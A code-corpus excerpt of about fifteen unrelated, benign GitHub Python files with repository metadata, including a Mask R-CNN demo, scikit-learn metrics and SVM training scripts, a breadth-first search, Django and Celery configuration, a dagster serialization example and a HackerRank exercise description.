        if erori != "":
            raise ValidError(erori)
|
[
"noreply@github.com"
] |
Nechita-Andrei.noreply@github.com
|
9d90ee73151f2714debf72cb43a5a97f3ba9983a
|
38f06b8e701b53b2659ac6def3c6b24f26d7f0fa
|
/demo/test.py
|
f129ef88bb0f188182e64d041b45b76c86b0f1da
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
drapedapp/maskrcnn-benchmark
|
67626f2fa7aae4bdb1f5d7d0ed93106bb5eb468d
|
e6494f7b7612cf23b48a57102b03ed0ca530a950
|
refs/heads/master
| 2020-05-04T00:17:15.854897
| 2019-05-16T16:23:56
| 2019-05-16T16:23:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 489
|
py
|
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
config_file = "configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml"
# update the config options with the config file
cfg.merge_from_file(config_file)
# manual override some options
cfg.merge_from_list(["MODEL.DEVICE", "cpu"])
coco_demo = COCODemo(
cfg,
min_image_size=800,
confidence_threshold=0.7,
)
# load image and then run prediction
image = ...
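# `image` is deliberately left elided above; one hypothetical way to supply a
# BGR image array (not part of the original snippet) would be:
#   import cv2
#   image = cv2.imread("demo.jpg")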
predictions = coco_demo.run_on_opencv_image(image)
|
[
"shaayaansayed@gmail.com"
] |
shaayaansayed@gmail.com
|
f65f22ea29aca677ecd69502b311e29eea1efc40
|
0280fc1aa108b5d8cb73cdb67ba6293ee20d4435
|
/code/metrics.py
|
0b03b4448a0fc9d813a9f6807c352994a16258a8
|
[] |
no_license
|
danielcomerio/2021-SBAI-Covid19_em_RaioX
|
bd8eee7e2c4f7052a5939ec7f1d6eeed0e459d74
|
90c981788c6c9b96e2cab15fd3de5c41a1024553
|
refs/heads/main
| 2023-08-02T15:06:26.831516
| 2021-10-02T23:24:37
| 2021-10-02T23:24:37
| 360,781,005
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,423
|
py
|
from sklearn.metrics import confusion_matrix, accuracy_score, precision_score, f1_score, recall_score, classification_report
import numpy as np
import argparse
def parse_command_line_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"-me", "--metrics", help="path to the metrics file", type=str, default="metrics.txt")
args = parser.parse_args()
return args
def main():
args = parse_command_line_args()
file_metrics = open(args.metrics, "r")
#file_metrics.write("path_imagem, classe_real, classe_predita")
label_list = []
predict_list = []
line = file_metrics.readline()
while line:
line = line.strip().split(", ")
label_list.append(line[1])
prediction = [float(line[2]), float(line[3]), float(line[4])]
prediction = np.argmax(prediction, axis=-1)
predict_list.append(str(prediction))
line = file_metrics.readline()
file_metrics.close()
print("confusion_matrix: \n", confusion_matrix(label_list, predict_list))
print("accuracy_score:", accuracy_score(label_list, predict_list))
print("precision_score:", precision_score(
label_list, predict_list, average='macro'))
print("f1_score:", f1_score(label_list, predict_list, average='macro'))
print("recall_score:", recall_score(
label_list, predict_list, average='macro'))
if __name__ == "__main__":
main()
|
[
"danielhcomerio@gmail.com"
] |
danielhcomerio@gmail.com
|
0a16de60999fd20f560463fbf91ef269d48e50c2
|
8bb9e879366fe91e5131f36f32784f7310ebb6ef
|
/Scripts/Breadth_First_Search.py
|
e1b6eacb7459db6db2cb26cc0702244debb43caa
|
[] |
no_license
|
rickmunene/Algorithms_And_Data_Structures
|
af4585aeffdbe1ed02894403b5fbf82476d2fd5c
|
eb5a12f5012ef3e1e190f06e0cb102046a3af5e0
|
refs/heads/main
| 2023-02-20T01:02:32.505447
| 2021-01-05T09:51:30
| 2021-01-05T09:51:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
class Node:
def __init__(self, name):
self.name = name
self.adjacency_list = []
self.visited = False
def breadth_first_search(start_node):
    queue = [start_node]
    start_node.visited = True  # mark on enqueue so a node is never queued twice
    while queue:
        actual_node = queue.pop(0)
        print(actual_node.name)
        for n in actual_node.adjacency_list:
            if not n.visited:
                n.visited = True
                queue.append(n)


if __name__ == '__main__':
node1 = Node('A')
    node2 = Node('B')
node3 = Node('C')
node4 = Node('D')
node5 = Node('E')
node1.adjacency_list.append(node2)
node1.adjacency_list.append(node3)
node2.adjacency_list.append(node4)
node4.adjacency_list.append(node5)
breadth_first_search(node1)
|
[
"noreply@github.com"
] |
rickmunene.noreply@github.com
|
a00e26b96aa832dc6274eea833daef5105f4ee2f
|
085baa87309809725098dcc614d670af6b2f5048
|
/ref-mac0350/mac0350fase3/atividade/apps.py
|
73b651708cc7e2f0b6aceeaacb2bd532130f3aa7
|
[] |
no_license
|
EdyKnopfler/mac0439-fase2
|
a9a6e1dbca2f7f81356061fc381f6f0d3851fbe3
|
7d4aa9cb80c90741932c83f6679332e307bbcbb6
|
refs/heads/master
| 2020-03-17T19:16:25.034351
| 2018-05-20T18:57:02
| 2018-05-20T18:57:02
| 133,852,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 158
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class AtividadeConfig(AppConfig):
name = 'atividade'
|
[
"ederson_cassio@yahoo.com.br"
] |
ederson_cassio@yahoo.com.br
|
13117c480aab101095108b73f28b0030d78c8704
|
010ebe5a10990c6e6bd0063012ec13f3d47c28ab
|
/tests/notifier/test_keep_alive_monitor.py
|
1cfc22dd1081c25b15893ad5f64213d58ee4f262
|
[
"MIT"
] |
permissive
|
amaier17/chiadog
|
f81dd5da51b3b9f8364d79adb4f6e0c545037781
|
e927c5806400353dca1401c7cfab9fa7571c03bd
|
refs/heads/main
| 2023-07-31T14:21:25.835620
| 2021-09-19T00:22:42
| 2021-09-19T00:22:42
| 407,995,978
| 1
| 0
|
MIT
| 2021-09-19T00:22:09
| 2021-09-19T00:22:08
| null |
UTF-8
|
Python
| false
| false
| 2,175
|
py
|
# std
import logging
import unittest
from datetime import datetime
from time import sleep
from typing import List
# project
from src.notifier import Event, EventService, EventType, EventPriority
from src.notifier.keep_alive_monitor import KeepAliveMonitor
logging.basicConfig(level=logging.DEBUG)
class DummyNotifyManager:
def __init__(self, callback):
self._callback = callback
def process_events(self, events: List[Event]):
if self._callback:
self._callback(events)
class TestKeepAliveMonitor(unittest.TestCase):
def setUp(self) -> None:
self.threshold_seconds = 3
self.keep_alive_monitor = KeepAliveMonitor(thresholds={EventService.HARVESTER: self.threshold_seconds})
self.keep_alive_event = Event(
type=EventType.KEEPALIVE, priority=EventPriority.NORMAL, service=EventService.HARVESTER, message=""
)
def tearDown(self) -> None:
self.keep_alive_monitor.stop()
def testBasic(self):
received_high_priority_event = False
def callback(events: List[Event]):
nonlocal received_high_priority_event
self.assertEqual(len(events), 1, "Unexpected number of events")
self.assertEqual(events[0].type, EventType.USER, "Unexpected event type")
self.assertEqual(events[0].priority, EventPriority.HIGH, "Unexpected event priority")
received_high_priority_event = True
notify_manager = DummyNotifyManager(callback)
self.keep_alive_monitor.set_notify_manager(notify_manager)
begin_tp = datetime.now()
for _ in range(self.threshold_seconds):
self.keep_alive_monitor.process_events([self.keep_alive_event])
sleep(1)
while not received_high_priority_event:
logging.info("Waiting for high priority event..")
sleep(1)
end_tp = datetime.now()
seconds_elapsed = (end_tp - begin_tp).seconds
# Check that high priority event did not fire before keep-alive signal stopped
self.assertGreater(seconds_elapsed, 2 * self.threshold_seconds - 1)
if __name__ == "__main__":
unittest.main()
|
[
"3739458+martomi@users.noreply.github.com"
] |
3739458+martomi@users.noreply.github.com
|
42131b454a17a5da23811e51276bfadfee0f92f9
|
36f7dc938fafbca60693119a902b2faedc6a986b
|
/core/celery.py
|
c4cc61c55f75d86be31edd9f9e819b633c7cb44d
|
[] |
no_license
|
okidijimmy200/myShop
|
53227c8c6aaac91fe6973ca8b61d76d78a22044e
|
b7d143480c7010660de7d8b95d5af1ccca1bab0c
|
refs/heads/master
| 2023-01-28T08:26:33.509357
| 2020-11-16T12:14:51
| 2020-11-16T12:14:51
| 301,716,891
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,194
|
py
|
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
'''You set the DJANGO_SETTINGS_MODULE variable for the Celery command-line
program.'''
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core.settings')
# You create an instance of the application with app = Celery('core').
app = Celery('core')
# --------------------------------------------------------------------------
'''You load any custom configuration from your project settings using the
config_from_object() method. The namespace attribute specifies the
prefix that Celery-related settings will have in your settings.py file.
By setting the CELERY namespace, all Celery settings need to include the
CELERY_ prefix in their name (for example, CELERY_BROKER_URL).'''
app.config_from_object('django.conf:settings', namespace='CELERY')
# --------------------------------------------------------------------------
'''Finally, you tell Celery to auto-discover asynchronous tasks for your
applications. Celery will look for a tasks.py file in each application
directory of applications added to INSTALLED_APPS in order to load
asynchronous tasks defined in it.'''
app.autodiscover_tasks()
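# --------------------------------------------------------------------------
'''A minimal sketch (hypothetical, not part of this project) of the kind of
tasks.py module that autodiscover_tasks() picks up from an installed app:

    # myapp/tasks.py
    from celery import shared_task

    @shared_task
    def send_welcome_email(user_id):
        ...  # any @shared_task-decorated function is registered automatically

shared_task is Celery's app-agnostic decorator, so the module never needs to
import this app instance directly.'''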
|
[
"okidijimmie@gmail.com"
] |
okidijimmie@gmail.com
|
010c30d9d1cdf68caf7d9cd6428c9897431cc718
|
f1961c86e6da14f35c21d7235f4fc8a89fabdcad
|
/DailyProgrammer/DP20160115C.py
|
d3eba687e813c8a24053dabb9857a302f2967953
|
[
"MIT"
] |
permissive
|
DayGitH/Python-Challenges
|
d4930bdd85cd1a977d8f6192775ca956a375fcde
|
bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf
|
refs/heads/master
| 2021-01-17T13:01:03.784523
| 2018-06-29T23:49:04
| 2018-06-29T23:49:04
| 58,497,683
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,519
|
py
|
"""
[2016-01-15] Challenge #249 [Hard] Museum Cameras
https://www.reddit.com/r/dailyprogrammer/comments/41346z/20160115_challenge_249_hard_museum_cameras/
# Description
You run a museum, and you have a small budget - but you have to protect the museum with cameras. Given some
descriptions of rooms, can you organize the smallest number of cameras to view the whole room?
Some assumptions and other factors for you to work with:
* Cameras can't see around corners.
* You can only place cameras in corners.
* Assume every camera has a field of view of 180 degrees, yielding a semicircular field of view.
* Assume every camera's field of view will be equal to the left and right of the line in the corner where the camera is
placed; this line bisects the angle of the corner. The camera points away from the corner.
* Assume every camera has an otherwise infinite view.
# Input Description
You'll be given a row with a single number *N* that tells you how many points to read. Then on the next line you'll be
given *N* points in a Cartesian coordinate space to draw the bounding box of the museum room. For example:
3
(0,0) (3,6) (6,0)
This translates to (pardon my ugly ASCII art) this triangle:
. .
/ \
=> / \
/ \
/ \
/ \
. . .___________.
# Output Description
Your program should emit the position of the cameras needed to cover the area. From our example:
(0,0)
That's one possible solution (for this one any of the corners would have worked).
If the shape has no solution, emit something like "The architect has no concept of security" because maybe they're
collaborating with art theives.
# Challenge Input
first room
4
(0,0) (5,0) (5,6) (0,6)
second room
5
(0,0) (7,0) (7,3) (5,6) (0,6)
third room
13
(0,5) (2,8) (5,7) (9,6) (10,9) (13,10) (13,6) (17,6) (16,3) (13,1) (7,1) (5,3) (2,3)
# Notes
This is a classic computational geometry problem called the [Art Gallery
Problem](https://en.wikipedia.org/wiki/Art_gallery_problem). For some ideas on calculating 2d visibility from a top
down map, [click here](http://www.redblobgames.com/articles/visibility/)
"""
def main():
pass
if __name__ == "__main__":
main()
|
[
"akber91@gmail.com"
] |
akber91@gmail.com
|
9c62aa02baa94c29ab3ff9da031a47c148765e2a
|
7730da1f3f4c59663bd45ae1934dc0867ce5c75c
|
/src/dao/inspect_task_dao.py
|
ccef139d2b18baf6e62cd60378c0c32b7a77956a
|
[] |
no_license
|
mengshanxi/spider
|
55d8bbc23d5fbd97df4e87b956fee35d4aabb178
|
1f9262a4fa64459fbd2474a7f5849b63cb960271
|
refs/heads/master
| 2022-12-08T16:24:44.118186
| 2020-07-09T14:37:41
| 2020-07-09T14:37:41
| 136,481,034
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
# coding:utf-8
from dao.db import session
from model.models import InspectTask
class InspectTaskDao(object):
@staticmethod
def get_task(task_id):
inspect_task = session.query(InspectTask).filter(InspectTask.id == task_id).one()
return inspect_task
|
[
"13811668973@163.com"
] |
13811668973@163.com
|
48147c01632bf43930c50ac32358fe0ca0faab7e
|
eeeb4d5fb7f47af61229ac7b5c55e5b9400d5510
|
/authsystemproject/manage.py
|
847ce7776b639a9d76ac5dbe1e8bbcc3b171d455
|
[] |
no_license
|
collinskoech11/authsystemproject
|
050ba9f5239e7676f49ee080bf4cec56bddb9c8d
|
8b5e95de03fc0f92332dbfa3ac0c0c023cbe80ee
|
refs/heads/master
| 2023-06-15T15:40:01.359428
| 2021-07-11T11:23:20
| 2021-07-11T11:23:20
| 378,850,989
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'authsystemproject.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"collinskoechck34@gmail.com"
] |
collinskoechck34@gmail.com
|
bd64d6030520ad84c31f801060f2e22635741ca1
|
935c3650a6572ade2d06756ab1a53d4b9b2973a8
|
/train_svm.py
|
3cd18b1abb94f826392e13b5dee8083dc810ee5a
|
[] |
no_license
|
impetusengine/Robo_ND_Perception_Project
|
2b1eabb4a446a285f0676eb419453a012eb33ee5
|
a7dc07828fbbf32a727f43d1806787e1688212f4
|
refs/heads/master
| 2021-04-30T15:03:57.182186
| 2018-02-13T11:18:17
| 2018-02-13T11:18:17
| 121,231,327
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,353
|
py
|
#!/usr/bin/env python
import pickle
import itertools
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm
from sklearn.preprocessing import LabelEncoder, StandardScaler
from sklearn.model_selection import KFold, cross_val_score, cross_val_predict
from sklearn import metrics
from sklearn.ensemble import RandomForestClassifier
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, '{0:.2f}'.format(cm[i, j]),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
# Load training data from disk
test_num = 0
training_set = pickle.load(open('training_set{}.sav'.format(test_num), 'rb'))
# Format the features and labels for use with scikit learn
feature_list = []
label_list = []
for item in training_set:
if np.isnan(item[0]).sum() < 1:
feature_list.append(item[0])
label_list.append(item[1])
print('Features in Training Set: {}'.format(len(training_set)))
print('Invalid Features in Training set: {}'.format(len(training_set)-len(feature_list)))
X = np.array(feature_list)
# Fit a per-column scaler
X_scaler = StandardScaler().fit(X)
# Apply the scaler to X
X_train = X_scaler.transform(X)
y_train = np.array(label_list)
# Convert label strings to numerical encoding
encoder = LabelEncoder()
y_train = encoder.fit_transform(y_train)
# Create classifier
clf = svm.SVC(kernel='sigmoid')
# Set up 5-fold cross-validation
kf = KFold(n_splits=5, shuffle=True, random_state=1)

# Perform cross-validation
scores = cross_val_score(estimator=clf, X=X_train, y=y_train,
                         cv=kf, scoring='accuracy')

print('Scores: ' + str(scores))
print('Accuracy: %0.2f (+/- %0.2f)' % (scores.mean(), 2*scores.std()))

# Gather predictions
predictions = cross_val_predict(estimator=clf, X=X_train, y=y_train, cv=kf)
accuracy_score = metrics.accuracy_score(y_train, predictions)
print('accuracy score: '+str(accuracy_score))
confusion_matrix = metrics.confusion_matrix(y_train, predictions)
class_names = encoder.classes_.tolist()
#Train the classifier
clf.fit(X=X_train, y=y_train)
model = {'classifier': clf, 'classes': encoder.classes_, 'scaler': X_scaler}
# Save classifier to disk
pickle.dump(model, open('model{}.sav'.format(test_num), 'wb'))
# Plot non-normalized confusion matrix
plt.figure()
plot_confusion_matrix(confusion_matrix, classes=encoder.classes_,
title='Confusion matrix, without normalization')
# Plot normalized confusion matrix
plt.figure()
plot_confusion_matrix(confusion_matrix, classes=encoder.classes_, normalize=True,
title='Normalized confusion matrix')
plt.show()
|
[
"noreply@github.com"
] |
impetusengine.noreply@github.com
|
ae363a1608b3f973d17f7f341e063c4143b48008
|
646862bcc35e43c58f2fd6ffbfed7dff5449bec5
|
/Project-6/build_23.py
|
2e115c719cc0b90eedcd8563d555784e599a4f75
|
[] |
no_license
|
kkdave28/Informatics-102-Spring-2018
|
09fe49ec640dd6e2cac7ebffd6bb60dc288a3ee2
|
572cd4a94a3d015ad4f68679c6d855e511a850a4
|
refs/heads/master
| 2020-03-08T07:51:09.651945
| 2018-05-25T22:20:15
| 2018-05-25T22:20:15
| 128,005,214
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 74
|
py
|
#!/usr/bin/env python
def main():
proces = "Do no compilation"
main()
|
[
"kkdave@uci.edu"
] |
kkdave@uci.edu
|
3297b38452a0268a4dda64536361fbee8512ea7f
|
179a800968fa260558807a5eaad00977ae2b0260
|
/test.py
|
6d203d238988e6e5827359de4f17ea890a2dd405
|
[] |
no_license
|
gupta93/app_simulator
|
c0d3c05845952a65e546d4bd62c41faa573bf7e3
|
94f67377e2a399e84c93b4bc34d7a3cd13cd37bb
|
refs/heads/master
| 2021-01-23T14:18:18.505808
| 2017-06-03T13:51:31
| 2017-06-03T13:51:31
| 93,251,218
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,971
|
py
|
from odyssey.v2.precomputations.functions import precompute_agent_location_snapshot
from odyssey.v2.precomputations.functions import precompute_dr
from odyssey.v2.precomputations.functions import precompute_drm
from odyssey.v2.precomputations.functions import precompute_member_data
from odyssey.v2.precomputations.functions import precompute_manager_reportee_tree_mapping
from odyssey.v2.precomputations.functions import precompute_mis_member_data
from odyssey.v2.common.utils import send_users
from odyssey.v2.groups.precomputations import create_department_mapping
from odyssey.v2.groups.precomputations import create_region_mapping
from odyssey.v2.precomputations.functions import precompute_day_wise_last_location
from odyssey.v2.periodic_mails.functions import send_inactive_members_email
from odyssey.v2.precomputations.functions import precompute_admin_member_access
import datetime
f = open('time_log_precompute.log','a')
f1 = open('error.log','a')
def master_function():
    # Each precompute step is timed on success and logged on failure.
    steps = [
        ('Agent Location Snapshot', precompute_agent_location_snapshot),
        ('Precompute Drm', precompute_drm),
        ('Precompute Dr', precompute_dr),
        ('Precompute Member Data', precompute_member_data),
        ('Precompute Manager Report', precompute_manager_reportee_tree_mapping),
        ('Precompute MIS', precompute_mis_member_data),
        ('Precompute Send Users', send_users),
        ('Department Mapping', create_department_mapping),
        ('Region Mapping', create_region_mapping),
        ('Precompute Day Wise Last Location', precompute_day_wise_last_location),
        ('Precompute Admin Member Access', precompute_admin_member_access),
    ]
    for label, func in steps:
        try:
            start = datetime.datetime.now()
            func()
            f.write('\n \n ' + label + ' : ' + str((datetime.datetime.now() - start).total_seconds()))
        except Exception:
            f1.write('\n \n error in ' + label)
|
[
"tushar@loktra.com"
] |
tushar@loktra.com
|
181f341b896016c1f672560c2623e19da3e7c974
|
754ac8f084839c9c42a38c3e6541140984792600
|
/lib/utils.py
|
0e00b50d6f8c2f45f552ce1430e3d0b5a708057d
|
[] |
no_license
|
chihfenl/spark-practice-mm
|
356da941576094aa816072d6bf617e33c16d8ecf
|
a5c0d8df74f84cdfe7d85fabd114426c5a5a8537
|
refs/heads/master
| 2021-06-20T00:07:39.132916
| 2017-06-26T17:43:36
| 2017-06-26T17:43:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,135
|
py
|
import os
import sys
def remove_timestamp_within_time_range(timestamp_list, second_of_range):
    """Collapse timestamps that fall within `second_of_range` seconds of each
    other, keeping only the earliest timestamp of each group."""
    result = []
    timestamp_list = sorted(timestamp_list)
    if len(timestamp_list) > 1:
        current_timestamp = timestamp_list[0]
        group_start_index = 0
        while current_timestamp:
            end_time = current_timestamp + second_of_range
            current_group = [
                timestamp for timestamp in timestamp_list[group_start_index:]
                if timestamp <= end_time
            ]
            result.append(min(current_group))
            group_start_index = timestamp_list.index(current_group[-1]) + 1
            current_timestamp = (
                timestamp_list[group_start_index]
                if group_start_index < len(timestamp_list) else None
            )
    else:
        return timestamp_list
    return result
def get_timestamp_less_than_target(timestamp_list, target):
result = []
target = int(target)
for timestamp in timestamp_list:
timestamp = int(timestamp)
if timestamp < target:
result.append(timestamp)
return result
|
[
"chihfeng.lin@bomoda.com"
] |
chihfeng.lin@bomoda.com
|
be8c32790f5c70150a3f641ba5a23666ce857a6f
|
cdd33a31d5b57a4a02803dded5e96a815fbb06d7
|
/examples/dagster_examples/intro_tutorial/serialization_strategy.py
|
828ccd9259a3982d5d826585b2dfb8b6f2819126
|
[
"Apache-2.0"
] |
permissive
|
david-alexander-white/dagster
|
4f177c167150316a5056901aa2522ab778d1d163
|
1c341500bb2380e14873b59b7e25503270188bda
|
refs/heads/master
| 2020-12-07T04:40:02.676080
| 2020-01-06T17:37:40
| 2020-01-07T22:19:01
| 232,633,648
| 1
| 0
|
Apache-2.0
| 2020-01-08T18:42:28
| 2020-01-08T18:42:27
| null |
UTF-8
|
Python
| false
| false
| 2,132
|
py
|
import csv
from dagster import (
SerializationStrategy,
dagster_type,
execute_pipeline,
pipeline,
solid,
)
class CsvSerializationStrategy(SerializationStrategy):
def __init__(self):
super(CsvSerializationStrategy, self).__init__(
'csv_strategy', read_mode='r', write_mode='w'
)
def serialize(self, value, write_file_obj):
fieldnames = value[0]
writer = csv.DictWriter(write_file_obj, fieldnames)
writer.writeheader()
writer.writerows(value)
def deserialize(self, read_file_obj):
reader = csv.DictReader(read_file_obj)
return LessSimpleDataFrame([row for row in reader])
@dagster_type(
name='LessSimpleDataFrame',
description=(
'A naive representation of a data frame, e.g., as returned by '
'csv.DictReader.'
),
serialization_strategy=CsvSerializationStrategy(),
)
class LessSimpleDataFrame(list):
pass
@solid
def read_csv(context, csv_path: str) -> LessSimpleDataFrame:
with open(csv_path, 'r') as fd:
lines = [row for row in csv.DictReader(fd)]
context.log.info('Read {n_lines} lines'.format(n_lines=len(lines)))
return LessSimpleDataFrame(lines)
@solid
def sort_by_calories(context, cereals: LessSimpleDataFrame):
sorted_cereals = sorted(cereals, key=lambda cereal: cereal['calories'])
context.log.info(
'Least caloric cereal: {least_caloric}'.format(
least_caloric=sorted_cereals[0]['name']
)
)
context.log.info(
'Most caloric cereal: {most_caloric}'.format(
most_caloric=sorted_cereals[-1]['name']
)
)
return LessSimpleDataFrame(sorted_cereals)
@pipeline
def serialization_strategy_pipeline():
sort_by_calories(read_csv())
if __name__ == '__main__':
environment_dict = {
'solids': {
'read_csv': {'inputs': {'csv_path': {'value': 'cereal.csv'}}}
},
'storage': {'filesystem': {}},
}
result = execute_pipeline(
serialization_strategy_pipeline, environment_dict=environment_dict
)
assert result.success
|
[
"max.gasner@gmail.com"
] |
max.gasner@gmail.com
|
f4a5f6929002096e27657e7a177ea188152b21f7
|
a10bd7af354d1aeef13ebfd786fc9e8054b661b6
|
/ely_db/energia/.migrations/0001_initial.py
|
d86307935cae47da3ea9515136adb5427099f5d9
|
[] |
no_license
|
xtornasol512/djdbmysql
|
b2bea1cde172a34bebb9cb82c7306d6a9f436e15
|
05d263899410662d9854cb788b3c018b3cb4f72a
|
refs/heads/master
| 2021-01-10T01:12:07.710385
| 2015-10-22T10:16:05
| 2015-10-22T10:16:05
| 44,737,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,507
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Compra_de_Plutonio',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('cantidad', models.FloatField()),
('fecha_entrega', models.DateTimeField()),
],
),
migrations.CreateModel(
name='Hidroelectrica',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('ocupacion', models.CharField(max_length=50)),
('capacidad_maxima', models.FloatField()),
('num_turbinas', models.IntegerField()),
],
),
migrations.CreateModel(
name='Nuclear',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('plutonio', models.FloatField()),
('num_reactores', models.IntegerField()),
('num_residuos', models.IntegerField()),
],
),
migrations.CreateModel(
name='Productor',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nombre', models.CharField(unique=True, max_length=50)),
('produccion_media', models.FloatField()),
('produccion_maxima', models.FloatField()),
('f_entrada', models.DateTimeField()),
],
),
migrations.CreateModel(
name='Solar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('tipo_energia', models.CharField(default=b'fotovoltaica', max_length=20, choices=[(b'fotovoltaica', b'Fotovoltaica'), (b'termodinamica', b'Termodin\xc3\xa1mica')])),
('num_paneles_solares', models.IntegerField()),
('media_anual_hrs_sol', models.IntegerField()),
('productor', models.ForeignKey(to='energia.Productor')),
],
),
migrations.CreateModel(
name='Suministrador',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nombre', models.CharField(max_length=50)),
('pais', models.CharField(max_length=50)),
('plantas_nucleares', models.ManyToManyField(to='energia.Nuclear')),
],
),
migrations.CreateModel(
name='Termica',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('num_hornos', models.IntegerField()),
('volumen_carbon_consumido', models.FloatField()),
('productor', models.ForeignKey(to='energia.Productor')),
],
),
migrations.CreateModel(
name='Transportista',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nombre', models.CharField(max_length=50)),
('direccion', models.CharField(max_length=100)),
],
),
migrations.AddField(
model_name='nuclear',
name='productor',
field=models.ForeignKey(to='energia.Productor'),
),
migrations.AddField(
model_name='hidroelectrica',
name='productor',
field=models.ForeignKey(to='energia.Productor'),
),
migrations.AddField(
model_name='compra_de_plutonio',
name='planta_nuclear',
field=models.ForeignKey(to='energia.Nuclear'),
),
migrations.AddField(
model_name='compra_de_plutonio',
name='suministrador',
field=models.ForeignKey(to='energia.Suministrador'),
),
migrations.AddField(
model_name='compra_de_plutonio',
name='transportista',
field=models.ForeignKey(to='energia.Transportista'),
),
]
|
[
"xtornasol512@gmail.com"
] |
xtornasol512@gmail.com
|
6ffbcb87ba74b9993f4633ebf8df5139e8f479c8
|
b7e4b737b41d74ff9070246a6d2d3f39a3395016
|
/stuff/notes/lambda-course/test.py
|
12b507b96eecef584b08efce7149816216ab2f09
|
[] |
no_license
|
sanjay51/ixtutor
|
52ac8f03215bbaedf91cf85e973f0700ca9ad624
|
0c0a18bc656c79633d45de28bbc6bcde12370462
|
refs/heads/master
| 2021-01-18T20:07:46.506728
| 2017-01-08T18:48:17
| 2017-01-08T18:48:17
| 86,939,397
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 294
|
py
|
# createCourse
{
"httpMethod": "GET",
"queryStringParameters": {
"operation": "createCourse",
"category": "ProgrammingLanguage",
"title": "Some title here",
"oneLineDescription": "Learn some basics",
"description": "This is a detailed description",
"author": 1
}
}
|
[
"sanjay.verma.nitk@gmail.com"
] |
sanjay.verma.nitk@gmail.com
|
b27fcba9d4de8591a010f9aadd890add6f1a1202
|
1eb4645a93dc50e3075d70207271ab69584204f1
|
/python/imp-finding_percentage.py
|
ee1994b9f9b2f9ba1415493bcefecdef96d40fa9
|
[] |
no_license
|
towfeeqfayaz11/hr_python
|
4c4a5cb2b53b10909dc6c602e01c448498c3a187
|
8070cb940afdca3d6eabccb543b5c3219254584b
|
refs/heads/master
| 2023-06-20T06:17:17.029982
| 2021-07-11T15:37:59
| 2021-07-11T15:37:59
| 343,180,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,681
|
py
|
# Problem: Finding the percentage ==> easy
# The provided code stub will read in a dictionary containing key/value pairs of name:[marks] for a list of students. Print the average of the marks
# array for the student name provided, showing 2 places after the decimal.
# Example
# marks key:value pairs are
# 'alpha':[20,30,40]
# 'beta':[30,50,70]
# query_name = 'beta'
# The query_name is 'beta'. beta's average score is .
# Input Format
# The first line contains the integer , the number of students' records. The next lines contain the names and marks obtained by a student, each value
# separated by a space. The final line contains query_name, the name of a student to query.
# Constraints
# 2<=n<=10
# 0<=marks[i]<=100
# length of marks array =3
# Output Format
# Print one line: The average of the marks obtained by the particular student correct to 2 decimal places.
# Sample Input 0
# 3
# Krishna 67 68 69
# Arjun 70 98 63
# Malika 52 56 60
# Malika
# Sample Output 0
# 56.00
# Explanation 0
# Marks for Malika are whose average is
# Sample Input 1
# 2
# Harsh 25 26.5 28
